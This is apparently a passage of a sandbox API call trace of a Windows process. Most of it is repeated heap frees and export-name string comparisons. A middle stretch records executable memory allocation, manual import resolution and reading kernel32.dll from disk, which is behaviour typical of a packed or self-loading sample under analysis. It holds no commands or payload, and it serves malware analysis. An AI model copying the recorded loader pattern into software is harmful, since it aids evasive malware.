[0107.568] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2a65270 | out: hHeap=0x590000) returned 1 [0107.568] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2a78480 | out: hHeap=0x590000) returned 1 [0107.568] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2a8b690 | out: hHeap=0x590000) returned 1 [0107.568] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2a9e8a0 | out: hHeap=0x590000) returned 1 [0107.568] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2ab1ab0 | out: hHeap=0x590000) returned 1 [0107.568] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2ac4cc0 | out: hHeap=0x590000) returned 1 [0107.568] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2ad7ed0 | out: hHeap=0x590000) returned 1 [0107.572] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2aeb0e0 | out: hHeap=0x590000) returned 1 [0107.572] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2afe2f0 | out: hHeap=0x590000) returned 1 [0107.572] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2b11500 | out: hHeap=0x590000) returned 1 [0107.572] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2b24710 | out: hHeap=0x590000) returned 1 [0107.572] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2b37920 | out: hHeap=0x590000) returned 1 [0107.574] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2b4ab30 | out: hHeap=0x590000) returned 1 [0107.574] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2b5dd40 | out: hHeap=0x590000) returned 1 [0107.575] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2b70f50 | out: hHeap=0x590000) returned 1 [0107.575] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2b84160 | out: hHeap=0x590000) returned 1 [0107.575] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2b97370 | out: hHeap=0x590000) returned 1 [0107.575] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2baa580 | out: hHeap=0x590000) returned 1 [0107.575] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2bbd790 | out: hHeap=0x590000) returned 1 [0107.575] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2bd09a0 | out: hHeap=0x590000) returned 1 [0107.575] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2be3bb0 | out: hHeap=0x590000) returned 1 [0107.578] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2bf6dc0 | out: hHeap=0x590000) returned 1 [0107.578] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2c09fd0 | out: hHeap=0x590000) returned 1 [0107.578] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2c1d1e0 | out: hHeap=0x590000) returned 1 [0107.578] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2c303f0 | out: hHeap=0x590000) returned 1 [0107.578] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2c43600 | out: hHeap=0x590000) returned 1 [0107.580] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2c56810 | out: hHeap=0x590000) returned 1 [0107.581] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2c69a20 | out: hHeap=0x590000) returned 1 [0107.581] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2c7cc30 | out: hHeap=0x590000) returned 1 [0107.581] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2c8fe40 | out: hHeap=0x590000) returned 1 [0107.581] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2ca3050 | out: hHeap=0x590000) returned 1 [0107.581] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2cb6260 | out: hHeap=0x590000) returned 1 [0107.581] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2cc9470 | out: hHeap=0x590000) returned 1 [0107.581] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2cdc680 | out: hHeap=0x590000) returned 1 [0107.581] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2cef890 | out: hHeap=0x590000) returned 1 [0107.585] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d02aa0 | out: hHeap=0x590000) returned 1 [0107.585] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d15cb0 | out: hHeap=0x590000) returned 1 [0107.585] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d28ec0 | out: hHeap=0x590000) returned 1 [0107.585] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d3c0d0 | out: hHeap=0x590000) returned 1 [0107.586] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d4f2e0 | out: hHeap=0x590000) returned 1 [0107.587] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d624f0 | out: hHeap=0x590000) returned 1 [0107.587] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d75700 | out: hHeap=0x590000) returned 1 [0107.587] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d88910 | out: hHeap=0x590000) returned 1 [0107.587] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2db0080 | out: hHeap=0x590000) returned 1 [0107.587] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2dc3290 | out: hHeap=0x590000) returned 1 [0107.587] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2dd64a0 | out: hHeap=0x590000) returned 1 [0107.588] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2de96b0 | out: hHeap=0x590000) returned 1 [0107.588] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2dfc8c0 | out: hHeap=0x590000) returned 1 [0107.588] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2e0fad0 | out: hHeap=0x590000) returned 1 [0107.588] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2e22ce0 | out: hHeap=0x590000) returned 1 [0107.588] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2e35ef0 | out: hHeap=0x590000) returned 1 [0107.794] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2e49100 | out: hHeap=0x590000) returned 1 [0107.796] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2e5c310 | out: hHeap=0x590000) returned 1 [0107.796] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2e6f520 | out: hHeap=0x590000) returned 1 [0107.796] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2e82730 | out: hHeap=0x590000) returned 1 [0107.796] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2e95940 | out: hHeap=0x590000) returned 1 [0107.796] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2ea8b50 | out: hHeap=0x590000) returned 1 [0107.800] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2ebbd60 | out: hHeap=0x590000) returned 1 [0107.800] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2ecef70 | out: hHeap=0x590000) returned 1 [0107.800] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2ee2180 | out: hHeap=0x590000) returned 1 [0107.800] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2ef5390 | out: hHeap=0x590000) returned 1 [0107.800] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2f085a0 | out: hHeap=0x590000) returned 1 [0107.803] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2f1b7b0 | out: hHeap=0x590000) returned 1 [0107.804] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2f2e9c0 | out: hHeap=0x590000) returned 1 [0107.804] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2f41bd0 | out: hHeap=0x590000) returned 1 [0107.804] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2f54de0 | out: hHeap=0x590000) returned 1 [0107.804] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2f67ff0 | out: hHeap=0x590000) returned 1 [0107.804] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2f7b200 | out: hHeap=0x590000) returned 1 [0107.804] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2f8e410 | out: hHeap=0x590000) returned 1 [0107.804] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2fa1620 | out: hHeap=0x590000) returned 1 [0107.804] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2fb4830 | out: hHeap=0x590000) returned 1 [0107.809] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2fc7a40 | out: hHeap=0x590000) returned 1 [0107.809] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2fdac50 | out: hHeap=0x590000) returned 1 [0107.810] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2fede60 | out: hHeap=0x590000) returned 1 [0107.810] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x3001070 | out: hHeap=0x590000) returned 1 [0107.810] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x3014280 | out: hHeap=0x590000) returned 1 [0107.810] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x3027490 | out: hHeap=0x590000) returned 1 [0107.810] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x303a6a0 | out: hHeap=0x590000) returned 1 [0107.810] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x304d8b0 | out: hHeap=0x590000) returned 1 [0107.810] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x3060ac0 | out: hHeap=0x590000) returned 1 [0107.810] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x3073cd0 | out: hHeap=0x590000) returned 1 [0107.810] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x3086ee0 | out: hHeap=0x590000) returned 1 [0107.810] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x309a0f0 | out: hHeap=0x590000) returned 1 [0107.818] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x30ad300 | out: hHeap=0x590000) returned 1 [0107.820] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x30c0510 | out: hHeap=0x590000) returned 1 [0107.823] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x30d3720 | out: hHeap=0x590000) returned 1 [0108.932] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0108.935] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0108.935] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0109.142] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0109.142] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0109.142] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0109.143] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0109.143] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0109.143] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0109.143] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0109.143] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0109.143] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0109.143] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0109.143] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0109.143] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0109.143] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0109.144] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0109.144] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0109.144] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0109.144] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0109.144] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0109.144] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0109.144] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0109.144] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0109.144] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0109.144] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0109.145] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0109.145] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bdb20 | out: hHeap=0x590000) returned 1 [0109.151] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd920 | out: hHeap=0x590000) returned 1 [0109.159] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a0160 | out: hHeap=0x590000) returned 1 [0109.161] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0109.161] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0109.162] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0109.162] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0109.162] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0109.162] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0109.164] GetProcessHeap () returned 0x590000 [0109.164] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x68) returned 0x598ca0 [0109.165] GetProcessHeap () returned 0x590000 [0109.165] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a92c0 [0109.166] GetProcessHeap () returned 0x590000 [0109.166] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x48) returned 0x5a0610 [0109.166] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0109.166] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0109.166] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0109.166] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0109.167] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0109.167] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0109.167] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0109.167] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0109.167] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0109.167] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0109.167] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0109.167] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0109.175] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0109.175] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0109.176] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0109.176] GetProcessHeap () returned 0x590000 [0109.176] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xac430) returned 0x5bc5d0 [0109.178] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0109.178] ReadFile (in: hFile=0x134, lpBuffer=0x5bc5d0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x5bc5d0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0109.400] CloseHandle (hObject=0x134) returned 1 [0109.400] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0109.407] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0109.407] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0109.407] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0109.407] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0109.407] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0109.407] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0109.407] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0109.407] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0109.407] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0109.407] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0109.407] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0109.407] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0109.407] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0109.407] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0109.407] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0109.407] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0109.408] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0109.408] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0109.408] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0109.408] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0109.408] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0109.408] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0109.408] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0109.408] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0109.408] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0109.408] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0109.408] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0109.408] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0109.408] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0109.408] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0109.408] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0109.408] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0109.408] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0109.408] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0109.408] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0109.408] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0109.408] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0109.408] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0109.409] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0109.409] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0109.409] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0109.409] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0109.409] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0109.409] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0109.409] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0109.409] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0109.409] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0109.409] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0109.409] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0109.409] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0109.409] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0109.410] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0109.410] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0109.410] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0109.410] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0109.410] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0109.410] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0109.410] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0109.410] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0109.410] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0109.410] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0109.410] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0109.410] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0109.411] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0109.411] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0109.411] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0109.411] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0109.411] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0109.411] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0109.411] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0109.411] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0109.411] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0109.411] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0109.411] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0109.411] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0109.411] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0109.411] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0109.411] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0109.411] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0109.411] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0109.411] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0109.411] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0109.411] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0109.411] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0109.412] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0109.412] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0109.412] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0109.412] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0109.412] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0109.412] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0109.412] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0109.412] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0109.412] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0109.412] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0109.412] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0109.412] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0109.412] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0109.412] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0109.412] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0109.412] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0109.412] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0109.412] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0109.412] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0109.413] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 